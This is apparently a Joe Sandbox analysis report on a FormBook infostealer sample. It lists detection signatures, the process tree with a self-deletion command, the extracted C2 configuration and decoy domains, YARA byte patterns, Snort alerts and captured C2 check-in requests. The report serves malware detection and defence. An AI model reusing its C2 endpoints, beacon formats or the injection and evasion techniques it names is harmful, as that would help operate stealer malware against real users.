Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report HkE0tD0g4NXKJfy.exe

Overview

General Information

Sample Name:HkE0tD0g4NXKJfy.exe
Analysis ID:528615
MD5:fcc2d1cda8d3989feca9c5f5f900e164
SHA1:075de723df172cc93c537d5472ad8025f192ddc8
SHA256:77e1c24ecfa1d339f61b4b8011690425fa0038b3fe32761f5ce8b3126c28c5ad
Tags:exeFormbookxloader
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • HkE0tD0g4NXKJfy.exe (PID: 5624 cmdline: "C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe" MD5: FCC2D1CDA8D3989FECA9C5F5F900E164)
    • HkE0tD0g4NXKJfy.exe (PID: 3336 cmdline: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe MD5: FCC2D1CDA8D3989FECA9C5F5F900E164)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msdt.exe (PID: 5960 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 5904 cmdline: /c del "C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.platinumcredit.net/sh5d/"], "decoy": ["officejava.store", "appletitan.info", "securebankofamericalog.site", "weprepareamerica-world.com", "suepersoldiers.com", "aproveiteagoras2.com", "harusan.website", "zqmm.net", "joinundergrad.com", "thefullfledged.com", "jadonzia.com", "maoshuochen.com", "tuntun-newmarket.com", "danijela-djordjevic.com", "usaonlinedocs.com", "penspanter.quest", "theclubhouse.tech", "jakital.com", "nj013.com", "foodpanda.digital", "arsels.info", "junkingcarslosangelescounty.com", "formaldressesforwomen.com", "xingruinet.ltd", "xcgtsret.com", "151motors.com", "realsteelsoftwaresending.com", "cutos2.com", "justifygomqbe.xyz", "ini91.com", "uniformfacilities.com", "bullochlifetimelegacy.com", "ddivfc.com", "tuvinoencamino.com", "nbtianzhou.com", "segmauth.com", "thelittlebookof52.com", "bellezamarket.store", "terrysboutique.store", "lightinghj.com", "malayray.com", "7routines.com", "costsma.net", "tapissier-uzes.com", "reparacion-termos-madrid.com", "combingtheratsnest.com", "bobcathntshop.com", "launchpalop.com", "gopheratms.com", "mydatingshop.com", "mosucoffee.club", "ebonyslivestockservice.online", "vupeliquid.com", "buzzsaw.club", "kg-zenith.com", "quimicosypapelesdelnte.com", "secure-mivote.com", "curatorsofkool.com", "quickipcheck.com", "ruggrunnerz.com", "magoro.com", "electricatrick.com", "coralload.com", "herhimalaya.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bec:$sqlite3step: 68 34 1C 7B E1
    • 0x16b08:$sqlite3text: 68 38 2A 90 C5
    • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
    0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x46b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x41a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x47b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 31 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      7.2.HkE0tD0g4NXKJfy.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        7.2.HkE0tD0g4NXKJfy.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        7.2.HkE0tD0g4NXKJfy.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bec:$sqlite3step: 68 34 1C 7B E1
        • 0x16b08:$sqlite3text: 68 38 2A 90 C5
        • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
        7.0.HkE0tD0g4NXKJfy.exe.400000.8.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          7.0.HkE0tD0g4NXKJfy.exe.400000.8.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 18 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Possible Applocker BypassShow sources
          Source: Process startedAuthor: juju4: Data: Command: C:\Windows\SysWOW64\msdt.exe, CommandLine: C:\Windows\SysWOW64\msdt.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\msdt.exe, NewProcessName: C:\Windows\SysWOW64\msdt.exe, OriginalFileName: C:\Windows\SysWOW64\msdt.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3352, ProcessCommandLine: C:\Windows\SysWOW64\msdt.exe, ProcessId: 5960

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.platinumcredit.net/sh5d/"], "decoy": ["officejava.store", "appletitan.info", "securebankofamericalog.site", "weprepareamerica-world.com", "suepersoldiers.com", "aproveiteagoras2.com", "harusan.website", "zqmm.net", "joinundergrad.com", "thefullfledged.com", "jadonzia.com", "maoshuochen.com", "tuntun-newmarket.com", "danijela-djordjevic.com", "usaonlinedocs.com", "penspanter.quest", "theclubhouse.tech", "jakital.com", "nj013.com", "foodpanda.digital", "arsels.info", "junkingcarslosangelescounty.com", "formaldressesforwomen.com", "xingruinet.ltd", "xcgtsret.com", "151motors.com", "realsteelsoftwaresending.com", "cutos2.com", "justifygomqbe.xyz", "ini91.com", "uniformfacilities.com", "bullochlifetimelegacy.com", "ddivfc.com", "tuvinoencamino.com", "nbtianzhou.com", "segmauth.com", "thelittlebookof52.com", "bellezamarket.store", "terrysboutique.store", "lightinghj.com", "malayray.com", "7routines.com", "costsma.net", "tapissier-uzes.com", "reparacion-termos-madrid.com", "combingtheratsnest.com", "bobcathntshop.com", "launchpalop.com", "gopheratms.com", "mydatingshop.com", "mosucoffee.club", "ebonyslivestockservice.online", "vupeliquid.com", "buzzsaw.club", "kg-zenith.com", "quimicosypapelesdelnte.com", "secure-mivote.com", "curatorsofkool.com", "quickipcheck.com", "ruggrunnerz.com", "magoro.com", "electricatrick.com", "coralload.com", "herhimalaya.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: HkE0tD0g4NXKJfy.exeReversingLabs: Detection: 26%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.HkE0tD0g4NXKJfy.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.346764994.0000000001880000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.551703779.0000000000970000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.553715961.0000000002C00000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.289531768.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.292187512.000000000408D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.292465648.00000000042A7000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.290051864.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: HkE0tD0g4NXKJfy.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: HkE0tD0g4NXKJfy.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msdt.pdbGCTL source: HkE0tD0g4NXKJfy.exe, 00000007.00000002.348444876.00000000035A0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: HkE0tD0g4NXKJfy.exe, 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, HkE0tD0g4NXKJfy.exe, 00000007.00000002.347642766.00000000019DF000.00000040.00000001.sdmp, msdt.exe, 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, msdt.exe, 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: HkE0tD0g4NXKJfy.exe, HkE0tD0g4NXKJfy.exe, 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, HkE0tD0g4NXKJfy.exe, 00000007.00000002.347642766.00000000019DF000.00000040.00000001.sdmp, msdt.exe, msdt.exe, 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, msdt.exe, 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp
          Source: Binary string: msdt.pdb source: HkE0tD0g4NXKJfy.exe, 00000007.00000002.348444876.00000000035A0000.00000040.00020000.sdmp
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 4x nop then pop ebx7_2_00406AB4
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 4x nop then pop esi7_2_00415760
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 4x nop then pop esi7_2_004157C6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then pop ebx13_2_02D06AB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then pop esi13_2_02D157C6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then pop esi13_2_02D15760

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49786 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49786 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49786 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49792 -> 142.250.203.115:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49792 -> 142.250.203.115:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49792 -> 142.250.203.115:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.platinumcredit.net
          Source: C:\Windows\explorer.exeDomain query: www.thefullfledged.com
          Source: C:\Windows\explorer.exeDomain query: www.jakital.com
          Source: C:\Windows\explorer.exeNetwork Connect: 142.250.203.115 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.xcgtsret.com
          Source: C:\Windows\explorer.exeDomain query: www.suepersoldiers.com
          Source: C:\Windows\explorer.exeDomain query: www.arsels.info
          Source: C:\Windows\explorer.exeDomain query: www.electricatrick.com
          Source: C:\Windows\explorer.exeNetwork Connect: 103.224.212.219 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 52.204.216.132 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.151motors.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.platinumcredit.net/sh5d/
          Source: Joe Sandbox ViewASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU
          Source: global trafficHTTP traffic detected: GET /sh5d/?Yv=hy4EQ9RQ8H0Qmf+V5oZYawTzVdNi6YgEsN2g+zlr8kWBt8RwCZI+yMGy7WuYiu2G3qgy&8pZ=MFQX HTTP/1.1Host: www.platinumcredit.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh5d/?Yv=KHnqZ0TbjHhhriSsr4IC2tQHFpsEpNX6XKtcehIZDPMVzpPTFiaMMZSG67rbMC0Gdpxx&8pZ=MFQX HTTP/1.1Host: www.151motors.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh5d/?Yv=SDhgbwSt5mB4DODrBIecU0Cn9nI1MHSsH0Hazkrlv9wpSquk3LdmspAinMLs2LJY3gHa&8pZ=MFQX HTTP/1.1Host: www.suepersoldiers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh5d/?Yv=U9Dn+H6I1oLCGiFi1oW/bg7Rnic0zjRPtt9AMGb5MRiLdOF7LfbhYF1T4mwo8MTrEy0Q&8pZ=MFQX HTTP/1.1Host: www.arsels.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh5d/?Yv=bH0MuGY0n47F1S4kOvzCBL0/mw6YL+7138CmEb6WqYz18csJYDgpNmReh/JvI3nBbY8S&8pZ=MFQX HTTP/1.1Host: www.electricatrick.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh5d/?Yv=Pdn0Hokg7Q3B7dDVtUX5QMohVVbqJZ0HrhWfxUy6sRCS+GjM4sZ5xKohcZ81Ep8iPYLe&8pZ=MFQX HTTP/1.1Host: www.vupeliquid.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 103.224.212.219 103.224.212.219
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Nov 2021 14:09:09 GMTContent-Type: text/htmlContent-Length: 275ETag: "618be73d-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Nov 2021 14:09:14 GMTContent-Type: text/htmlContent-Length: 275ETag: "618be75c-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Nov 2021 14:09:36 GMTContent-Type: text/htmlContent-Length: 275ETag: "6192576c-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Nov 2021 14:10:15 GMTContent-Type: text/htmlContent-Length: 275ETag: "6192576d-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.291856624.0000000003081000.00000004.00000001.sdmp, HkE0tD0g4NXKJfy.exe, 00000000.00000002.291957293.000000000314B000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: msdt.exe, 0000000D.00000002.550615461.0000000000453000.00000004.00000020.sdmpString found in binary or memory: http://www.jakital.com/
          Source: msdt.exe, 0000000D.00000002.550810990.0000000000475000.00000004.00000020.sdmpString found in binary or memory: http://www.jakital.com/sh5d/?Yv=deNwNK4CD/WMHHT4cYNp3s43CKigm652n7BnZRGAFJqHojdiJSlOhFJhA2qOeK3G
          Source: unknownDNS traffic detected: queries for: www.platinumcredit.net
          Source: global trafficHTTP traffic detected: GET /sh5d/?Yv=hy4EQ9RQ8H0Qmf+V5oZYawTzVdNi6YgEsN2g+zlr8kWBt8RwCZI+yMGy7WuYiu2G3qgy&8pZ=MFQX HTTP/1.1Host: www.platinumcredit.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh5d/?Yv=KHnqZ0TbjHhhriSsr4IC2tQHFpsEpNX6XKtcehIZDPMVzpPTFiaMMZSG67rbMC0Gdpxx&8pZ=MFQX HTTP/1.1Host: www.151motors.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh5d/?Yv=SDhgbwSt5mB4DODrBIecU0Cn9nI1MHSsH0Hazkrlv9wpSquk3LdmspAinMLs2LJY3gHa&8pZ=MFQX HTTP/1.1Host: www.suepersoldiers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
